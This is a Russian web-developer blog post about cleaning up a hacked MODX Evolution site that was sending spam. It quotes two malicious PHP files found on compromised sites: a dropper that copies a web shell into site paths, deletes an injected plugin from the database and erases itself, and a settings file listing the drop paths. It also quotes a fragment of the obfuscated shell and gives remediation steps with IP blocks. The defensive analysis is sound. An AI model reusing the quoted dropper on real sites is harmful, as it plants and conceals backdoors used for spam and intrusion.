меню

Служба мониторинга сервисов хостинг провайдера известила, что один из моих сайтов рассылает спам. При проверке сайта на наличие вредоностного кода, антивирусы промолчали. Пришлось воспользоваться гуглом. По данной проблеме MODX Evo: Массовая рассылка корреспонденции (SPAM) информации набралось не так уж много. На сайте одного из MODx сообществ решался аналогичный вопрос "Похоже тоже взломали. Пошли письма". Т.е. на сайт был загружен Shell, который производил массовую рассылку СПАМА.

Похоже тоже взломали. Пошли письма.

Один из участников сообщества поделился некими ранее обнаружившимися несколькими интересными файлами через которые все это безобразие заливается.

UploadShell.php


<?php

require_once $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php';
$file = file_get_contents($filePath);
$res = file_put_contents($uploadPath, $file);

global $modx;
$pluginsTable = $modx->getFullTableName("site_plugins");
$result = $modx->db->query("SELECT id FROM $pluginsTable WHERE name = 'exp' ");
$count = mysql_num_rows($result);

if ($count > 0) {
        $row = $modx->db->getRow($result);
        
        if ($row['id']) {
                $pluginDel = $modx->db->query("DELETE FROM $pluginsTable WHERE name = 'exp' ");

                $eventsTable = $modx->getFullTableName("site_plugin_events");
                $id = $row['id'];
                $eventDel = $modx->db->query("DELETE FROM $eventsTable WHERE pluginid = $id ");

                $modx->clearCache();
        include_once MODX_BASE_PATH . "manager/processors/cache_sync.class.processor.php";
        $sync = new synccache();
        $sync->setCachepath(MODX_BASE_PATH . "assets/cache/");
        $sync->setReport(false);
        $sync->emptyCache();
        }
}

unlink($filePath);
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/FileSettings.php');
unlink($_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/UploadShell.php');

echo $res;
die();

FileSettings.php


<?php

# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
 $uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
 $fileBaseName = 'lang.php';

$uploadPath    = $_SERVER['DOCUMENT_ROOT'].$uploadBasePath;
$filePath          = $_SERVER['DOCUMENT_ROOT'].'/assets/cache/temp/'.$fileBaseName;
$localFilePath = '/var/www/jonin/data/www/niblocklogistics.com/retro2/protected/commands/'.$fileBaseName;

Решение

Проверить папки с путями, что указаны в коде. Удалить файлы, что указаны в коде. Файлы Shell'а содержат обфусцированый код ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"] ... Так же необходимо удалить папку temp, которая лежит assets/cache/.


# $uploadBasePath = '/manager/processors/kill.processor.php';
# $uploadBasePath = '/assets/images/logo.php';
# $uploadBasePath = '/manager/includes/lang/country/murug_country.inc.php';
 $uploadBasePath = '/lang.php';
# $uploadBasePath = '/manager/media/style/MODxCarbon/images/icons/index.php'; # 7c39_0303.php
# $fileBaseName = '841rewb3v4x.php';
 $fileBaseName = 'lang.php';

После того, как вы удалили вредоносные файлы Shell'a. Пройдите следующую процедуру.

  • Произведите BackUp всего проекта и Базы Данной.
  • Обновите Вашу систему управления до последней актуальной версии.
  • Смените пароль FTP доступа.
  • В файл htaccess добавить правило

 


Order Deny,Allow
Deny from 80.243.184.227
Deny from 77.59.166.128
Deny from 146.185.239.19


Возможно, вам будет интересно

Создание тегов, меток или хэштегов в MODx

В этой статье рассмотрим, как в MODX с помощью дополнения Tagger добавить к ресурсам метки или хэштеги, а также как их использовать для поиска соответствующих ресурсов и создания облака тегов.

Авторизация через соц.сети в MODX: hybridauth

Компонент MODX Revo Hybridauth позволяет регистрироваться пользователям на сайте через социальные сети и подгружать из них данных, а также объединять их в аккаунте.

Вывод даты MODx Revo

В разработке функциональности блока новостей, блога и тд. чаще всего приходится использовать вывод даты публикации документа. А именно важна сама форма выводы даты.

Документация по pdoResources

Сниппет предназначен для вывода списка ресурсов. Является продвинутой заменой для getResources: обладает всеми его возможностями, но лишен недостатков. Умеет правильно сортировать ТВ параметры, присоединять таблицы при выборке, включать и исключать категории из разных контекстов и еще много чего.

Оформление заявки

Документы на создание сайта

Изучите наше коммерческое предложение, заполните БРИФ и отправьте его на почту maxidebox@list.ru. Изучив все пожелания из БРИФ-а, обратным ответом оповестим Вас по стоимости разработке, ответим на вопросы.

КП на создание сайта Коммерческое предложение на созданеи сайта

Мы берем на себя ответственность за все стадии работы и полностью избавляем клиентов от забот и необходимости вникать в тонкости.

Скачать БРИФ (акета) на создание сайта Скачать БРИФ (акета) на создание сайта

Зополните у БРИФ-а все необходимые поля. Сделайте краткое описание к каждому из пунктов анкеты, привидите примеры в соответсвующий пунктах - это позволит лучше понять Ваши ожидания и требования к сайту